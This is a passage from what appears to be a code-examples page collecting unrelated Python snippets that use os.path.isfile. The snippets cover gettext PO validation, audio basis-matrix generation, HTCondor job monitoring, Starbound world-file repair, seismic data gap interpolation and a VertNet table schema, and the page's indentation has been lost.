errors = validate_substitutions_match(entry.msgid, entry.msgstr, 'msgid', 'msgstr')
entry_errors.extend(errors)
if have_msgid_plural and have_msgstr:
n_plurals = 0
for index, msgstr in entry.msgstr_plural.items():
have_msgstr_plural = msgstr.strip() != ''
if have_msgstr_plural:
n_plurals += 1
errors = validate_substitutions_match(entry.msgid_plural, msgstr, 'msgid_plural', 'msgstr_plural[%s]' % index)
entry_errors.extend(errors)
else:
entry_errors.append('msgstr_plural[%s] is empty' % (index))
if n_plural_forms != n_plurals:
entry_errors.append('%d plural forms specified, but this entry has %d plurals' % (n_plural_forms, n_plurals))
if pedantic:
if have_msgid:
errors = validate_substitution_syntax(entry.msgid, 'msgid')
entry_warnings.extend(errors)
if have_msgid_plural:
errors = validate_substitution_syntax(entry.msgid_plural, 'msgid_plural')
entry_warnings.extend(errors)
errors = validate_substitutions_match(entry.msgid, entry.msgid_plural, 'msgid', 'msgid_plural')
entry_warnings.extend(errors)
for index, msgstr in entry.msgstr_plural.items():
have_msgstr_plural = msgstr.strip() != ''
if have_msgstr_plural:
errors = validate_substitution_syntax(msgstr, 'msgstr_plural[%s]' % index)
entry_warnings.extend(errors)
if have_msgstr:
errors = validate_substitution_syntax(entry.msgstr, 'msgstr')
entry_warnings.extend(errors)
if entry_warnings:
warning_lines.append(entry_seperator)
warning_lines.append('locations: %s' % (', '.join(["%s:%d" % (x[0], int(x[1])) for x in entry.occurrences])))
warning_lines.extend(entry_warnings)
n_warnings += 1
if entry_errors:
error_lines.append(entry_seperator)
error_lines.append('locations: %s' % (', '.join(["%s:%d" % (x[0], int(x[1])) for x in entry.occurrences])))
error_lines.extend(entry_errors)
n_errors += 1
emit_messages()
return Result(n_entries=n_entries, n_msgids=n_msgids, n_msgstrs=n_msgstrs, n_warnings=n_warnings, n_errors=n_errors)
0
Example 65
Project: pyfasst Source File: separateLeadFunctions.py
def generate_WF0_NSGTMinQT_chirped(minF0, maxF0, cqtfmax, cqtfmin, cqtbins=48.,
Fs=44100., Nfft=2048, stepNotes=4, \
lengthWindow=2048, Ot=0.5, perF0=1, \
depthChirpInSemiTone=0.5, loadWF0=True,
analysisWindow='hanning',
atomHopFactor=0.25,
cqtWinFunc=np.hanning, verbose=False):
"""
::
F0Table, WF0 = generate_WF0_MinCQT_chirped(minF0, maxF0, Fs, Nfft=2048,
stepNotes=4, lengthWindow=2048,
Ot=0.5, perF0=2,
depthChirpInSemiTone=0.5)
Generates a 'basis' matrix for the source part WF0, using the
source model KLGLOTT88, with the following I/O arguments:
Inputs:
:param minF0:
the minimum value for the fundamental
frequency (F0)
:param maxF0:
the maximum value for F0
:param cqtfmax:
...
:param Fs:
the desired sampling rate
:param Nfft:
the number of bins to compute the Fourier
transform
:param stepNotes:
the number of F0 per semitone
:param lengthWindow:
the size of the window for the Fourier
transform
:param Ot:
the glottal opening coefficient for
KLGLOTT88
:param perF0:
the number of chirps considered per F0
value
:param depthChirpInSemiTone:
the maximum value, in semitone, of the
allowed chirp per F0
Outputs:
:returns:
* `F0Table` - the vector containing the values of the fundamental
frequencies in Hertz (Hz) corresponding to the
harmonic combs in WF0, i.e. the columns of WF0
* `WF0` - the basis matrix, where each column is a harmonic comb
generated by KLGLOTT88 (with a sinusoidal model, then
transformed into the spectral domain)
20120828T2358 Horribly slow...
"""
# generating a filename to keep data:
filename = str('').join(['wf0nsgtminqt_',
'_minF0-', str(minF0),
'_maxF0-', str(maxF0),
'_cqtfmax-', str(cqtfmax),
'_cqtfmin-', str(cqtfmin),
'_cqtbins-', str(cqtbins),
'_Fs-', str(int(Fs)),
'_Nfft-', str(int(Nfft)),
'_atomHopFactor-%.2f' %(atomHopFactor),
'_stepNotes-', str(int(stepNotes)),
'_Ot-', str(Ot),
'_perF0-', str(int(perF0)),
'_depthChirp-', str(depthChirpInSemiTone),
'_analysisWindow-', analysisWindow,
'_cqtwinfunc-', cqtWinFunc.__name__,
'.npz'])
if os.path.isfile(filename) and loadWF0:
print "Reading WF0 and F0Table from stored arrays in %s." %filename
struc = np.load(filename)
return struc['F0Table'], struc['WF0'], struc['mqt'].tolist()
else:
print "No such file: %s." %filename
print "First time WF0 computed with these parameters, please wait..."
# converting to double arrays:
minF0=np.double(minF0)
maxF0=np.double(maxF0)
Fs=np.double(Fs)
stepNotes=np.double(stepNotes)
# computing the F0 table:
numberOfF0 = np.ceil(12.0 * stepNotes * np.log2(maxF0 / minF0)) + 1
F0Table=minF0 * (2 ** (np.arange(numberOfF0,dtype=np.double) \
/ (12 * stepNotes)))
numberElementsInWF0 = numberOfF0 * perF0
# note: cqtfmax should actually be computed so as to guarantee
# the desired Nfft:
# cqtfmax = np.ceil(3. * Fs / (Nfft * (2**(1./cqtbins) - 1)))
# strange things happening to FFTLen...
if verbose>1: print "cqtfmax set to", cqtfmax
mqt = nsgt.nsgtMinQT(ftlen=Nfft,
cqtfmin=cqtfmin,
cqtfmax=cqtfmax,
bpo=cqtbins,
fs=Fs,
datalength=lengthWindow,
)
if verbose>2:
print mqt.cqtkernel
print mqt.fmin, mqt.fmax, mqt.linFTLen, mqt.octaveNr, mqt.linBins
# computing the desired WF0 matrix
WF0 = np.zeros([mqt.cqtkernel.bins*mqt.octaveNr+
mqt.cqtkernel.linBins,
numberElementsInWF0],
dtype=np.double)
# slow... try faster : concatenate the odgd, compute one big cqt of that
# result and extract only the desired frames:
##odgds = np.array([])
for fundamentalFrequency in np.arange(numberOfF0):
if verbose>0:
print " f0 n.", fundamentalFrequency+1, "/", numberOfF0
odgd, odgdSpec = \
generate_ODGD_spec(F0Table[fundamentalFrequency], Fs, \
Ot=Ot, lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0,\
analysisWindowType=analysisWindow)
mqt.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((mqt.datalen_init / 2. - mqt.time_stamps)**2)
if verbose>1: print midindex, mqt.transfo.shape, WF0.shape
WF0[:,fundamentalFrequency * perF0] = np.abs(mqt.transfo[:,midindex])**2
# del mqt.transfo # maybe needed but might slow down even more...
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##print odgds.shape, odgd.shape
for chirpNumber in np.arange(perF0 - 1):
F2 = F0Table[fundamentalFrequency] \
* (2 ** ((chirpNumber + 1.0) * depthChirpInSemiTone \
/ (12.0 * (perF0 - 1.0))))
# F0 is the mean of F1 and F2.
F1 = 2.0 * F0Table[fundamentalFrequency] - F2
odgd, odgdSpec = \
generate_ODGD_spec_chirped(F1, F2, Fs, \
Ot=Ot, \
lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0)
mqt.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((mqt.datalen_init / 2.
- mqt.time_stamps)**2)
WF0[:,fundamentalFrequency * perF0 + chirpNumber + 1] = \
np.abs(mqt.transfo[:,midindex]) ** 2
# del mqt.transfo # idem
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##hybt.computeHybrid(data=odgds)
##midindex = np.argmin((lengthWindow / 2. + lengthWindow
## * np.vstack(np.arange(numberElementsInWF0))
## - hybt.time_stamps)**2, axis=1)
##if verbose>1: print midindex
##WF0 = np.abs(hybt.spCQT[:,midindex]) ** 2
np.savez(filename, F0Table=F0Table, WF0=WF0, mqt=mqt)
return F0Table, WF0, mqt #, hybt, odgds
0
Example 66
def updateMonitoringInformation(jobs):
jobDict = {}
for job in jobs:
if job.backend.id:
jobDict[job.backend.id] = job
idList = jobDict.keys()
if not idList:
return
queryCommand = " ".join\
([
"condor_q -global" if getConfig(
"Condor")["query_global_queues"] else "condor_q",
"-format \"%s \" GlobalJobId",
"-format \"%s \" RemoteHost",
"-format \"%d \" JobStatus",
"-format \"%f\\n\" RemoteUserCpu"
])
status, output = commands.getstatusoutput(queryCommand)
if 0 != status:
logger.error("Problem retrieving status for Condor jobs")
return
if ("All queues are empty" == output):
infoList = []
else:
infoList = output.split("\n")
allDict = {}
for infoString in infoList:
tmpList = infoString.split()
id, host, status, cputime = ("", "", "", "")
if 3 == len(tmpList):
id, status, cputime = tmpList
if 4 == len(tmpList):
id, host, status, cputime = tmpList
if id:
allDict[id] = {}
allDict[id]["status"] = Condor.statusDict[status]
allDict[id]["cputime"] = cputime
allDict[id]["host"] = host
fg = Foreground()
fx = Effects()
status_colours = {'submitted': fg.orange,
'running': fg.green,
'completed': fg.blue}
for id in idList:
printStatus = False
if jobDict[id].status == "killed":
continue
localId = id.split("#")[-1]
globalId = id
if globalId == localId:
queryCommand = " ".join\
([
"condor_q -global" if getConfig(
"Condor")["query_global_queues"] else "condor_q",
"-format \"%s\" GlobalJobId",
id
])
status, output = commands.getstatusoutput(queryCommand)
if 0 == status:
globalId = output
if globalId in allDict.keys():
status = allDict[globalId]["status"]
host = allDict[globalId]["host"]
cputime = allDict[globalId]["cputime"]
if status != jobDict[id].backend.status:
printStatus = True
stripProxy(jobDict[id])._getSessionLock()
jobDict[id].backend.status = status
if jobDict[id].backend.status == "Running":
jobDict[id].updateStatus("running")
if host:
if jobDict[id].backend.actualCE != host:
jobDict[id].backend.actualCE = host
jobDict[id].backend.cputime = cputime
else:
jobDict[id].backend.status = ""
outDir = jobDict[id].getOutputWorkspace().getPath()
condorLogPath = "".join([outDir, "condorLog"])
checkExit = True
if os.path.isfile(condorLogPath):
checkExit = False
for line in open(condorLogPath):
if -1 != line.find("terminated"):
checkExit = True
break
if -1 != line.find("aborted"):
checkExit = True
break
if checkExit:
printStatus = True
stdoutPath = "".join([outDir, "stdout"])
jobStatus = "failed"
if os.path.isfile(stdoutPath):
with open(stdoutPath) as stdout:
lineList = stdout.readlines()
try:
exitLine = lineList[-1]
exitCode = exitLine.strip().split()[-1]
except IndexError:
exitCode = '-1'
if exitCode.isdigit():
jobStatus = "completed"
else:
# Some filesystems/setups have the file created but empty - only worry if it's been 10mins
# since we first checked the file
if len(lineList) == 0:
if not jobDict[id].backend._stdout_check_time:
jobDict[id].backend._stdout_check_time = time.time()
if (time.time() - jobDict[id].backend._stdout_check_time) < 10*60:
continue
else:
logger.error("Empty stdout file from job %s after waiting 10mins. Marking job as"
"failed." % jobDict[id].fqid)
else:
logger.error("Problem extracting exit code from job %s. Line found was '%s'." % (
jobDict[id].fqid, exitLine))
jobDict[id].updateStatus(jobStatus)
if printStatus:
if jobDict[id].backend.actualCE:
hostInfo = jobDict[id].backend.actualCE
else:
hostInfo = "Condor"
status = jobDict[id].status
if status in status_colours:
colour = status_colours[status]
else:
colour = fg.magenta
if "submitted" == status:
preposition = "to"
else:
preposition = "on"
if jobDict[id].backend.status:
backendStatus = "".join\
([" (", jobDict[id].backend.status, ") "])
else:
backendStatus = ""
logger.info(colour + 'Job %s %s%s %s %s - %s' + fx.normal,
jobDict[
id].fqid, status, backendStatus, preposition, hostInfo,
time.strftime('%c'))
return None
0
Example 67
Project: py-starbound Source File: repair.py
def main():
p = optparse.OptionParser('Usage: %prog [options] <input file>')
p.add_option('-f', '--force', dest='force',
action='store_true', default=False,
help='ignore some errors')
p.add_option('-o', '--output', dest='output',
help='where to output repaired world (defaults to input file '
'path with .repaired added to the end)')
p.add_option('-w', '--blank-world', dest='world',
help='the blank .world file that was created in place of the '
'.fail one (for metadata recovery)')
options, arguments = p.parse_args()
# Get the path from arguments.
if len(arguments) != 1:
p.error('incorrect number of arguments')
try:
fh = open(arguments[0], 'rb')
file_size = os.fstat(fh.fileno()).st_size
world = starbound.World(fh)
except Exception as e:
p.error('could not open fail file ({})'.format(e))
# Output path (defaults to fail file + .repaired).
if options.output:
out_name = options.output
else:
out_name = arguments[0] + '.repaired'
# Ensure the user doesn't accidentally overwrite existing files.
if os.path.isfile(out_name):
if options.force:
print('warning: overwriting existing file')
else:
p.error('"{}" already exists'.format(out_name))
# Allow user to use the fresh world for metadata (which should be the same).
if options.world:
fail_name = os.path.basename(arguments[0])
world_name = os.path.basename(options.world)
if fail_name[:len(world_name)] != world_name:
if options.force:
print('warning: .fail and .world filenames do not match')
else:
p.error('.fail and .world filenames do not match')
try:
blank_world = starbound.World(open(options.world, 'rb'))
except Exception as e:
p.error('could not open blank world ({})'.format(e))
# This dict will contain all the keys and their data.
data = dict()
try:
world.read_metadata()
metadata, version = world.metadata, world.metadata_version
except Exception as e:
if options.world:
try:
print('warning: restoring metadata using blank world')
blank_world.read_metadata()
metadata, version = blank_world.metadata, blank_world.metadata_version
except Exception as e:
p.error('failed to restore metadata ({})'.format(e))
else:
p.error('metadata section is corrupt ({})'.format(e))
try:
size = metadata['worldTemplate']['size']
except Exception as e:
size = [-1, -1]
print('warning: failed to read world size ({})'.format(e))
regions_x = int(math.ceil(size[0] / 32))
regions_y = int(math.ceil(size[1] / 32))
print('attempting to recover {}×{} regions...'.format(regions_x, regions_y))
block_count = int((file_size - starbound.btreedb5.HEADER_SIZE) / world.block_size)
blocks_per_percent = block_count // 100 + 1
nodes_recovered = 0
percent = 0
# Find all leaves and try to read them individually.
for index in range(block_count):
if index % blocks_per_percent == 0:
print('{}% ({} nodes recovered)'.format(percent, nodes_recovered))
percent += 1
# Seek to the block and only process it if it's a leaf.
world.stream.seek(starbound.btreedb5.HEADER_SIZE + world.block_size * index)
if world.stream.read(2) != starbound.btreedb5.LEAF:
continue
stream = starbound.btreedb5.LeafReader(world)
try:
num_keys, = struct.unpack('>i', stream.read(4))
except Exception as e:
print('failed to read keys of leaf block #{}: {}'.format(index, e))
continue
# Ensure that the number of keys makes sense, otherwise skip the leaf.
if num_keys > 100:
continue
for i in range(num_keys):
try:
cur_key = stream.read(world.key_size)
cur_data = starbound.sbon.read_bytes(stream)
except Exception as e:
print('could not read key/data: {}'.format(e))
break
layer, x, y = struct.unpack('>BHH', cur_key)
# Skip this leaf if we encounter impossible indexes.
if layer == 0 and (x != 0 or y != 0):
break
if layer not in (0, 1, 2) or x >= regions_x or y >= regions_y:
break
result = None
if cur_key in data:
# Duplicates should be checked up against the index, which always wins.
# TODO: Make this code run again.
try:
#result = world.get(layer, x, y)
result = None
except Exception:
world.swap_root()
try:
#result = world.get(layer, x, y)
result = None
except Exception:
pass
world.swap_root()
# Use the data from this leaf if not using the index.
if not result:
try:
result = zlib.decompress(cur_data)
except Exception as e:
print('broken leaf node: {}'.format(e))
continue
# Validate the data before storing it.
try:
if layer == 0:
temp_stream = io.BytesIO(result)
temp_stream.seek(8)
name, _, _ = starbound.read_versioned_json(temp_stream)
assert name == 'WorldMetadata', 'broken world metadata'
elif layer == 1:
assert len(result) == 3 + 32 * 32 * 30, 'broken region data'
elif layer == 2:
temp_stream = io.BytesIO(result)
for _ in range(starbound.sbon.read_varint(temp_stream)):
starbound.read_versioned_json(temp_stream)
except Exception as e:
print('invalid key data: {}'.format(e))
continue
# Count the node the first time it's stored.
if cur_key not in data:
nodes_recovered += 1
data[cur_key] = zlib.compress(result)
METADATA_KEY = b'\x00\x00\x00\x00\x00'
# Ensure that the metadata key is in the data.
if METADATA_KEY not in data:
if options.world:
try:
data[METADATA_KEY] = blank_world.get(0, 0, 0)
except Exception:
p.error('failed to recover metadata from alternate world')
else:
if options.force:
try:
data[METADATA_KEY] = world.get(0, 0, 0)
print('warning: using partially recovered metadata')
except Exception:
p.error('failed to recover partial metadata')
else:
p.error('failed to recover metadata; use -w to load metadata '
'from another world, or -f to attempt partial recovery')
print('done! {} nodes recovered'.format(nodes_recovered))
print('creating BTree database...')
# Try not to exceed this number of keys per leaf.
LEAF_KEYS_TRESHOLD = 10
# Try not to exceed this size for a leaf.
LEAF_SIZE_TRESHOLD = world.block_size * .8
# Fill indexes up to this ratio.
INDEX_FILL = .9
# 6 is the number of bytes used for signature + next block pointer.
LEAF_BYTES = world.block_size - 6
# 11 is the number of bytes in the index header.
INDEX_BYTES = world.block_size - 11
# Maximum number of keys that can go into an index.
INDEX_MAX_KEYS = int(INDEX_BYTES // (world.key_size + 4) * INDEX_FILL)
# The data of individual blocks will be stored in this list.
blocks = []
buffer = io.BytesIO()
# This will create an initial leaf and connect it to following leaves which
# will all contain the data currently in the buffer.
def dump_buffer():
buffer_size = buffer.tell()
buffer.seek(0)
block_data = b'LL' + struct.pack('>i', num_keys) + buffer.read(LEAF_BYTES - 4)
while buffer.tell() < buffer_size:
blocks.append(block_data + struct.pack('>i', len(blocks) + 1))
block_data = b'LL' + buffer.read(LEAF_BYTES)
blocks.append(block_data.ljust(world.block_size - 4, b'\x00') + struct.pack('>i', -1))
# Empty the buffer.
buffer.seek(0)
buffer.truncate()
# The number of keys that will be stored in the next created leaf.
num_keys = 0
# Map of key range to leaf block pointer.
range_to_leaf = dict()
# All the keys, sorted (important).
keys = sorted(data)
# Build all the leaf blocks.
min_key = None
for key in keys:
if not num_keys:
# Remember the first key of the leaf.
min_key = key
buffer.write(key)
starbound.sbon.write_bytes(buffer, data[key])
num_keys += 1
# Empty buffer once one of the tresholds is reached.
if num_keys >= LEAF_KEYS_TRESHOLD or buffer.tell() >= LEAF_SIZE_TRESHOLD:
range_to_leaf[(min_key, key)] = len(blocks)
dump_buffer()
num_keys = 0
# Empty any remaining data in the buffer.
if buffer.tell():
range_to_leaf[(min_key, key)] = len(blocks)
dump_buffer()
print('created {} blocks containing world data'.format(len(blocks)))
def build_index_level(range_to_block, level=0):
# Get a list of ranges that this index level needs to point to.
index_ranges = sorted(range_to_block)
# The new list of ranges that the next level of indexes can use.
new_ranges = dict()
for i in range(0, len(index_ranges), INDEX_MAX_KEYS):
ranges = index_ranges[i:i + INDEX_MAX_KEYS]
min_key, _ = ranges[0]
_, max_key = ranges[-1]
left_block = range_to_block[ranges.pop(0)]
index_data = io.BytesIO()
index_data.write(b'II' + struct.pack('>Bii', level, len(ranges), left_block))
for key_range in ranges:
index_data.write(key_range[0] + struct.pack('>i', range_to_block[key_range]))
new_ranges[(min_key, max_key)] = len(blocks)
blocks.append(index_data.getvalue().ljust(world.block_size, b'\x00'))
print('- created {} index(es) for level {}'.format(len(new_ranges), level))
return new_ranges
# Build the indexes in multiple levels up to a single root node.
print('creating root node...')
root_is_leaf = True
level = 0
current_index = range_to_leaf
while len(current_index) > 1:
current_index = build_index_level(current_index, level)
root_is_leaf = False
level += 1
root_node = list(current_index.values())[0]
# Also build an alternative root node.
print('creating alternate root node...')
alternate_root_is_leaf = True
level = 0
current_index = range_to_leaf
while len(current_index) > 1:
current_index = build_index_level(current_index, level)
alternate_root_is_leaf = False
level += 1
alternate_root_node = list(current_index.values())[0]
# The last two blocks will be free blocks.
blocks.append(b'FF\xFF\xFF\xFF\xFF' + b'\x00' * (world.block_size - 6))
blocks.append(b'FF\xFF\xFF\xFF\xFF' + b'\x00' * (world.block_size - 6))
print('writing all the data to disk...')
with open(out_name, 'wb') as f:
header = struct.pack(starbound.btreedb5.HEADER,
b'BTreeDB5',
world.block_size,
world.name.encode('utf-8') + b'\x00' * (16 - len(world.name)),
world.key_size,
False,
len(blocks) - 1,
14282, # XXX: Unknown value!
root_node,
root_is_leaf,
len(blocks) - 2,
14274, # XXX: Unknown value!
alternate_root_node,
alternate_root_is_leaf)
f.write(header)
for block in blocks:
f.write(block)
print('done!')
0
Example 68
def build_section(fileB1,fileB2,channels,A0_int,A0_frac ,A1_int ,A1_frac ,filebase):
startB1 = None
endB1 = None
values_endB1 = None
values_startB2 = None
startB2 = None
endB2 = None
timespanA = round(A1_int - A0_int + (A1_frac - A0_frac )*1e-6,5)
no_samplesA = int(timespanA * 1e6) /2000 +1
if op.isfile(fileB1):
startB1 =np.float64(GetFirstLine(fileB1).strip().split()[-1])
endB1 = np.float64(tail(fileB1)[0].strip().split()[-1])
values_endB1 = [float(i) for i in tail(fileB1)[0].strip().split()[:-1]]
B10_int = int(startB1)
B10_frac = int(np.round( (startB1- B10_int)*1e6/2000)) * 2000
B11_int = int(endB1)
B11_frac = int(np.round( (endB1- B11_int)*1e6/2000)) * 2000
timespanB1 = round(B11_int - B10_int + (B11_frac - B10_frac )*1e-6,5)
no_samplesB1 = int(timespanB1 * 1e6) /2000
else:
fileB1 = None
if op.isfile(fileB2):
values_startB2 = [float(i) for i in GetFirstLine(fileB2).strip().split()[:-1]]
startB2 =np.float64(GetFirstLine(fileB2).strip().split()[-1])
endB2 = np.float64(tail(fileB2)[0].strip().split()[-1])
B20_int = int(startB2)
B20_frac = int(np.round( (startB2- B20_int)*1e6/2000)) * 2000
B21_int = int(endB2)
B21_frac = int(np.round( (endB2- B21_int)*1e6/2000)) * 2000
timespanB2 = round(B21_int - B20_int + (B21_frac - B20_frac )*1e-6,5)
no_samplesB2 = int(timespanB2 * 1e6) /2000
else:
fileB2 = None
# print startB1,endB1
# print startB2,endB2
if fileB1 is not None and fileB2 is not None:
#find time axis for bridging the gap between the B files
#...assuming 500 Hz here !!!
# working on mu s to avoid float64 rounding issues
t0_int = int(endB1)
t0_frac = int(np.round( (endB1- t0_int)*1e6/2000)) * 2000
t1_int = int(startB2)
t1_frac = int(np.round( (startB2 - t1_int)*1e6/2000)) * 2000
print "end {1}: {0:.6f}".format(endB1,fileB1), "start {1}: {0:.6f}".format(startB2,fileB2)
#print t0_int,t0_frac,t1_int,t1_frac
gap = round(t1_int - t0_int + (t1_frac - t0_frac )*1e-6,5)
# in mu s
no_samples = int(gap * 1e6) /2000 -1
#print no_samples,'{0:.6f}'.format(t0_frac),'{0:.6f}'.format(t0_frac+gap*1e-6)
taxis = (np.arange(no_samples+1)*2000 + t0_frac)[1:]
taxis = taxis*1e-6 + t0_int
print
print 'bridging gap ',"{0:.6f}".format(taxis[0]) , ' --> ', "{0:.6f}".format(taxis[-1]) , ' ',len(taxis) , 'samples'
#and the same for the actual values...:
bridge_data = np.zeros((len(taxis),len(values_startB2)),np.float32)
for i in range(len(values_startB2)):
bridge_data[:,i] = np.linspace(values_endB1[i],values_startB2[i],len(taxis)+1,endpoint=False)[1:]
# print values_endB1
# print values_startB2
# print bridge_data[0]
# print bridge_data[-1]
# sys.exit()
#Find the origin time of A in this set of B1, B2 and bridge:
# it must be in either B1 or the bridge
# assume it's in B1....deal with the special case later:
gapAB1 = round(t0_int - A0_int + (t0_frac - A0_frac )*1e-6,5)
no_samplesAB1 = int(gapAB1 * 1e6) /2000 + 1
print '\ntake the last {0} samples from {1}'.format(no_samplesAB1,fileB1)
gapAB2 = round(A1_int - t1_int + (A1_frac - t1_frac )*1e-6,5)
no_samplesAB2 = int(gapAB2 * 1e6) /2000 +1
print 'take {0} samples from gap'.format(len(bridge_data))
print 'take the first {0} samples from {1}'.format(no_samplesAB2,fileB2)
print '(total samples: {0})'.format(no_samplesAB1+len(bridge_data)+no_samplesAB2)
print
#sys.exit()
dataOut = np.zeros((no_samplesA,4),np.float32)
#pid = os.fork()
#if pid > 0:
# child = pid
# print 'reading file B1 ... (parent)'
samples2skip = no_samplesB1-no_samplesAB1 +1
counter = 0
idx = 0
for line in open(fileB1):# in enumerate(tail(fileB1,no_samplesAB1)):
counter += 1
if counter <= samples2skip:
continue
val = line.strip().split()
try:
dataOut[idx] = np.array([float(val[0]),float(val[1]),float(val[2]),float(val[3])])
if idx == 0 :
#print val
pass
except:
print val,idx,samples2skip
print np.array([float(val[0]),float(val[1]),float(val[2]),float(val[3]),np.float64(val[4]) ])
sys.exit()
idx += 1
print val
#sys.exit()
#assume end is in B2
print 'interpolating gap ... '
dataOut[no_samplesAB1:no_samplesAB1+len(bridge_data)] = bridge_data
# print ' waiting for child 1'
# os.waitpid(child, 0)
#else:
B2data = np.zeros((no_samplesAB2,4),np.float32)
print 'reading file data B2/C2 ... ({0})'.format(os.getpid())
idx = 0
for line in open(fileB2):#idx,val in enumerate(GetFirstLine(fileB2,no_samplesAB2)):
val = line.strip().split()
if idx ==0:
#print val
pass
B2data[idx] = np.array([float(val[0]),float(val[1]),float(val[2]),float(val[3]) ])
idx+= 1
if idx == no_samplesAB2:
#print val
break
dataOut[-no_samplesAB2:] = B2data
for idx_c, ch in enumerate(lo_channels[:-1]):
if idx_c in channels:
print 'pid ({0})'.format(os.getpid()), idx_c,ch
fnB = '{0}.{1}'.format(filebase,ch)
data = (dataOut[:,idx_c])
#data = detrend_linear(dataOut[:,idx_c])
with open(fnB,'w') as F:
for d in data:
if d%1 == 0:
F.write('{0}\n'.format(int(d)))
else:
F.write('{0:.10f}\n'.format(d))
#F.write('{0:.2f}\n'.format(d))
print 'file {0} done'.format(fnB)
0
Example 69
Project: retriever Source File: vertnet.py
def download(self, engine=None, debug=False):
Script.download(self, engine, debug)
engine = self.engine
file_names = [ ('vertnet_latest_amphibians.csv','amphibians'),
('vertnet_latest_birds.csv','birds'),
('vertnet_latest_fishes.csv','fishes'),
('vertnet_latest_mammals.csv','mammals'),
('vertnet_latest_reptiles.csv','reptiles')
]
for(filename,tablename) in file_names:
table = Table(str(tablename) , delimiter=',' )
# all tables in vertnet data have same field names
table.columns = [ ("record_id", ("pk-auto",)),
("beginrecord", ("char",)),
("icode", ("char",)),
("title", ("char",)),
("citation", ("char",)),
("contact", ("char",)),
("email", ("char",)),
("emlrights", ("char",)),
("gbifdatasetid", ("char",)),
("gbifpublisherid", ("char",)),
("doi", ("char",)),
("migrator", ("char",)),
("networks", ("char",)),
("orgcountry", ("char",)),
("orgname", ("char",)),
("orgstateprovince", ("char",)),
("pubdate", ("char",)),
("source_url", ("char",)),
("iptrecordid", ("char",)),
("associatedmedia", ("char",)),
("associatedoccurrences", ("char",)),
("associatedorganisms", ("char",)),
("associatedreferences", ("char",)),
("associatedsequences", ("char",)),
("associatedtaxa", ("char",)),
("bed", ("char",)),
("behavior", ("char",)),
("catalognumber", ("char",)),
("continent", ("char",)),
("coordinateprecision", ("char",)),
("coordinateuncertaintyinmeters", ("char",)),
("country", ("char",)),
("countrycode", ("char",)),
("county", ("char",)),
("dateidentified", ("char",)),
("day", ("char",)),
("decimallatitude", ("char",)),
("decimallongitude", ("char",)),
("disposition", ("char",)),
("earliestageorloweststage", ("char",)),
("earliesteonorlowesteonothem", ("char",)),
("earliestepochorlowestseries", ("char",)),
("earliesteraorlowesterathem", ("char",)),
("earliestperiodorlowestsystem", ("char",)),
("enddayofyear", ("char",)),
("establishmentmeans", ("char",)),
("eventdate", ("char",)),
("eventid", ("char",)),
("eventremarks", ("char",)),
("eventtime", ("char",)),
("fieldnotes", ("char",)),
("fieldnumber", ("char",)),
("footprintspatialfit", ("char",)),
("footprintsrs", ("char",)),
("footprintwkt", ("char",)),
("formation", ("char",)),
("geodeticdatum", ("char",)),
("geologicalcontextid", ("char",)),
("georeferencedby", ("char",)),
("georeferenceddate", ("char",)),
("georeferenceprotocol", ("char",)),
("georeferenceremarks", ("char",)),
("georeferencesources", ("char",)),
("georeferenceverificationstatus", ("char",)),
("group", ("char",)),
("habitat", ("char",)),
("highergeography", ("char",)),
("highergeographyid", ("char",)),
("highestbiostratigraphiczone", ("char",)),
("identificationid", ("char",)),
("identificationqualifier", ("char",)),
("identificationreferences", ("char",)),
("identificationremarks", ("char",)),
("identificationverificationstatus", ("char",)),
("identifiedby", ("char",)),
("individualcount", ("char",)),
("island", ("char",)),
("islandgroup", ("char",)),
("latestageorhigheststage", ("char",)),
("latesteonorhighesteonothem", ("char",)),
("latestepochorhighestseries", ("char",)),
("latesteraorhighesterathem", ("char",)),
("latestperiodorhighestsystem", ("char",)),
("lifestage", ("char",)),
("lithostratigraphicterms", ("char",)),
("locality", ("char",)),
("locationaccordingto", ("char",)),
("locationid", ("char",)),
("locationremarks", ("char",)),
("lowestbiostratigraphiczone", ("char",)),
("materialsampleid", ("char",)),
("maximumdepthinmeters", ("char",)),
("maximumdistanceabovesurfaceinmeters", ("char",)),
("maximumelevationinmeters", ("char",)),
("member", ("char",)),
("minimumdepthinmeters", ("char",)),
("minimumdistanceabovesurfaceinmeters", ("char",)),
("minimumelevationinmeters", ("char",)),
("month", ("char",)),
("municipality", ("char",)),
("occurrenceid", ("char",)),
("occurrenceremarks", ("char",)),
("occurrencestatus", ("char",)),
("organismid", ("char",)),
("organismname", ("char",)),
("organismremarks", ("char",)),
("organismscope", ("char",)),
("othercatalognumbers", ("char",)),
("pointradiusspatialfit", ("char",)),
("preparations", ("char",)),
("previousidentifications", ("char",)),
("recordedby", ("char",)),
("recordnumber", ("char",)),
("reproductivecondition", ("char",)),
("samplingeffort", ("char",)),
("samplingprotocol", ("char",)),
("sex", ("char",)),
("startdayofyear", ("char",)),
("stateprovince", ("char",)),
("typestatus", ("char",)),
("verbatimcoordinates", ("char",)),
("verbatimcoordinatesystem", ("char",)),
("verbatimdepth", ("char",)),
("verbatimelevation", ("char",)),
("verbatimeventdate", ("char",)),
("verbatimlatitude", ("char",)),
("verbatimlocality", ("char",)),
("verbatimlongitude", ("char",)),
("verbatimsrs", ("char",)),
("waterbody", ("char",)),
("year", ("char",)),
("dctype", ("char",)),
("modified", ("char",)),
("language", ("char",)),
("license", ("char",)),
("rightsholder", ("char",)),
("accessrights", ("char",)),
("bibliographiccitation", ("char",)),
("dc_references", ("char",)),
("institutionid", ("char",)),
("collectionid", ("char",)),
("datasetid", ("char",)),
("institutioncode", ("char",)),
("collectioncode", ("char",)),
("datasetname", ("char",)),
("ownerinstitutioncode", ("char",)),
("basisofrecord", ("char",)),
("informationwithheld", ("char",)),
("datageneralizations", ("char",)),
("dynamicproperties", ("char",)),
("scientificnameid", ("char",)),
("namepublishedinid", ("char",)),
("scientificname", ("char",)),
("acceptednameusage", ("char",)),
("originalnameusage", ("char",)),
("namepublishedin", ("char",)),
("namepublishedinyear", ("char",)),
("higherclassification", ("char",)),
("kingdom", ("char",)),
("phylum", ("char",)),
("class", ("char",)),
("order", ("char",)),
("family", ("char",)),
("genus", ("char",)),
("subgenus", ("char",)),
("specificepithet", ("char",)),
("infraspecificepithet", ("char",)),
